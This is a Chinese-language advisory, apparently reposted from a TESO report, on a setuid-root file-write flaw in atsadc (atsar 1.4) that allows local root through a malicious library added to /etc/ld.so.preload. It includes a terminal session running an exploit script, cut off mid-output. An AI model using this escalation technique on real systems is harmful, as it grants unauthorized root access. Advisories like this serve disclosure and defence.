受影响系统: AT Computing atsar 1.4-linux + Halloween Linux 4.0 描述: atsar是一个Linux下的负载监视软件包,由AT Computing出品。这个软件包中有个程序atsadc被设置了setuid root位。atsadc会接受一个参数作为输入文件名,并将打开这个文件,但是它没有检查是否该用户有权限读写这个文件。当它以root身份打开或者创建目标文件后,攻击在者可能写入任意内容到这个文件中。通过创建恶意的系统文件,攻击者可能本地获得root权限。比如创建一个恶意的共享库,然后在/etc/ld.so.preload中增加这个库的路径,然后执行一个设置了setuid root的程序(比如/usr/bin/passwd),然后恶意共享库就将被预装载并执行。 <* 来源: krahmer TESO advisory -- atsadc (http://teso.scene.at) *> 测试方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! liane:[bletchley]> id -a uid=501(bletchley) gid=501(bletchley) groups=501(bletchley) liane:[bletchley]> uname -a Linux liane.c-skills.de 2.2.13-13 #21 Thu Mar 2 10:36:13 WET 2000 i686 unknown liane:[bletchley]> stat `which atsadc` File: "/usr/sbin/atsadc" Size: 16000 Filetype: Regular File Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) Device: 3,1 Inode: 117038 Links: 1 Access: Thu Mar 9 10:09:37 2000(00000.01:02:49) Modify: Tue Nov 9 23:57:50 1999(00120.11:14:36) Change: Tue Mar 7 14:55:23 2000(00001.20:17:03) liane:[bletchley]> cd atsar-hack/ liane:[atsar-hack]> ./ass.pl Creating hijack-lib ... Compiling hijack-lib ... Compile shell ... Invoking vulnerable program (atsadc)... sh: error in loading shared libraries:
UNIX系统的mtr存在潜在安全漏洞Linux wmcdplay 缓冲区溢出漏洞相关资讯 Linux漏洞
- 敲击28次退格键之后:Linux漏洞可 (12/18/2015 11:22:28)
- Linux出现重大漏洞 GHOST ? (01/30/2015 18:35:07)
- Linux 2.6.31本地代码执行漏洞( (07/07/2014 07:51:17)
| - Red Hat Linux 修补“libuser”库 (07/26/2015 06:39:34)
- 红帽反驳:“Grinch(鬼精灵)”算 (12/30/2014 07:38:23)
- Linux gcc++漏洞:普通用户获得 (08/16/2013 11:57:41)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站